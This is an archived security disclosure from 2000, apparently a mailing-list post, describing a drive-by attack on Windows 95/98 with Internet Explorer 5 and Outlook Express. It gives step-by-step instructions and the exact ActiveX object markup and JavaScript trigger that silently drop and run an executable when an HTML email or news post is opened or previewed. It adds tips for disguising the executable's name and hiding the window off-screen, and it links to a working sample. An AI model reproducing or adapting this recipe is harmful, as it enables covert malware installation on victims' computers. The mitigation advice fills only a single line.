Saturday, May 13, 2000

MICROSOFT SECURITY FLAW?

Silent delivery and installation of an executable on a target computer. No
client input other than opening an email or newsgroup post.

1. Using the following this can be accomplished with the default
installation of Windows 95 and 98 and Internet Explorer 5 browsers and
accompanying mail/news clients

2. The key component from Georgi Guninski 

http://www.nat.bg/~joro/wordpad-desc.html

3. Secondary component comprises a pre-installed ActiveX control directly
from Microsoft. This control and a variety of similar demonstrations have
been shown to Microsoft over 18 months ago

What to do:

A

(a) Manufacture a *.chm file. The following kit from Microsoft is free and
very easy to use Microsoft=AE HTML Help:

http://msdn.microsoft.com/library/tools/htmlhelp/wkshp/download.htm

(b) Construct a new *.chm file inputting the ActiveX link control as
follows:

<OBJECT id=3DAA classid=3D"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
  width=3D100 height=3D100>
 <PARAM name=3D"Command" value=3D"ShortCut">
<PARAM name=3D"Button" value=3D"Bitmap:shortcut">
 <PARAM name=3D"Item1" value=3D",C:\WINDOWS\TEMP\MALWARE.exe,">
  <PARAM name=3D"Item2" value=3D"273,1,1">
</OBJECT>

<SCRIPT>

AA.Click();
</SCRIPT> 

(c) The control itself is quite sensitive to manipulation, the above
represents the bare minimum to run. 

(d) Input the path of the executable you intend to run as in PARAM
name=3D"Item1" above. In order to disguise the running of the executable it=
 is
suggested to not to give it a silly name, rather something that is familiar
to the operating system e.g. microsoftagent.exe etc. 

(e) While constructing the *.chm, it is possible to both minimise and offse=
t
the location of the *.chm file once opened. For example while under
construction you can set the size of the help window and its location -
using the auto resizer in Microsoft=AE HTML Help, drag the sizer to the
smallest possible size. Although setting the size requires clicking OK
inside the autosizer, dragging to minimal size and hitting ENTER will
register the setting. Secondly offset the location of the file by inputting
say 2000 , 2000, this should suffice in it opening off-screen on any size
monitor. 

(f) Once you have compiled the *.chm test its functionality by placing the
executable in your temp file and open the *.chm - it should run the
executable. 

Now how do we place this on the target computer?

B.

(a) Simply by opening an email message or newsgroup post. The client does
nothing. They receive an email  open it or read a newsgroup post and that i=
s
all.  Both the *.exe and *.chm are transferred silently and immediately to
the temp folder once the email or newsgroup post is open.

How so?

(b) It is possible to embed almost anything in both html email and html
news. Current versions of Outlook Express 5 inspect what is being embedded
is in fact the correct file e.g. <img src=3D"abc.doc"> will not embed becau=
se
a *.doc is obviously not an image file. Internet Explorer 4 and accompanyin=
g
Outlook Express 4 does allow for this, similarly Netscape Messenger also
allows for this. Nevertheless, through proprietary JavaScript and VBscript,
it is possible to deliver an intact file to the target computer's temp
folder, however with a file name given by the computer e.g. 000321.doc. Thi=
s
does not serve the purpose of running the *.chm with the file name explicit
as above. 

(c) The Microsoft Active Movie Control (AMC) pre-registered and
pre-installed on all Internet Explorer 5 computers does. The very simple
scripting to do this is as follows: 

<OBJECT classid=3Dclsid:05589FA1-C356-11CE-BF01-00AA0055595A height=3D1
style=3D"DISPLAY: none" width=3D1>

<PARAM NAME=3D"Filename" VALUE=3D"C:\WINDOWS\DESKTOP\MALWARE.chm">

<OBJECT classid=3Dclsid:05589FA1-C356-11CE-BF01-00AA0055595A height=3D1
style=3D"DISPLAY: none" width=3D1>

<PARAM NAME=3D"Filename" VALUE=3D"C:\WINDOWS\DESKTOP\MALWARE.exe"> 

(d) This control too is very sensitive and the complete path must be
inserted in order for it to embed in the html email message or html news
post.

(e) Finally, in the body of the html email or html news post the following
simple JavaScript is required to set off everything:

<SCRIPT>

setTimeout('window.showHelp("c:/windows/temp/MALWARE.chm");',15000);

</SCRIPT>

Sufficient delay must be allowed for the news post or email message and
transference of both the executable and *.chm files to be delivered to the
target computers temp file before execution is called.

What will happen?

When the email or news post is opened, the embedded *.chm and *.exe will
automatically and silently be transferred to the client temp folder, intact
and with the given names. Default locations on all machines calls for the
temp folder to be at C:\windows\temp. The AMC control, will deposit the two
files to wherever the temp folder is located, if you have changed the
location, these two files will still be delivered there, however because th=
e
*.chm file is constructed to seek out the *.exe in the default location, it
will fail. Likewise so will the script in the html email message or news
post. Hence, this will only work on default OS installs. 

Once the news post or email has been opened or even previewed via Outlook o=
r
Outlook Express preview pane, the two files are delivered to the temp
folder, sufficient time elapses when the script in the html message calls
the *.chm which opens silently and minimised in the task bar (because we
have instructed it to open at the minimum size and off-set 2000, 2000), onc=
e
opened it, the ActiveX link control in it, runs the executable. 

Everything is instantaneous, no need for a reboot and no need for user
interaction other than opening the email (or simply previewing it) or the
newsgroup post. Needless to say once the executable is running, the damage
is done. And no Windows Scripting Host (WSH) involved. 

The only solution is to relocate the temp folder and/or set scripting and
ActiveX controls to the highest possible settings. The default settings do
not ask for permission. 

Below represents a working example. The executable incorporated is a
harmless joke program. In order to run it, save the entire example as eithe=
r
*.nws or *.eml and click on it: 

note: 1/ on high speed machines and i-connections with IE5, clicking the
links below will allow for viewing of these news and mail files in the
browser (technically known as mhtml), with the same effect. Slower machines
and i-connections might want to save to disk and open from there.
Additionally saving to disk and opening will allow for viewing in the mail
or news client.

note: 2/ it is not necessary to run this through html mail or news, applyin=
g
all the above directly on the web results in the same.

Right-click and save to desktop

Mail:  http://members.xoom.com/malware/help.eml  89KB

News: http://members.xoom.com/malware/help.nws  89KB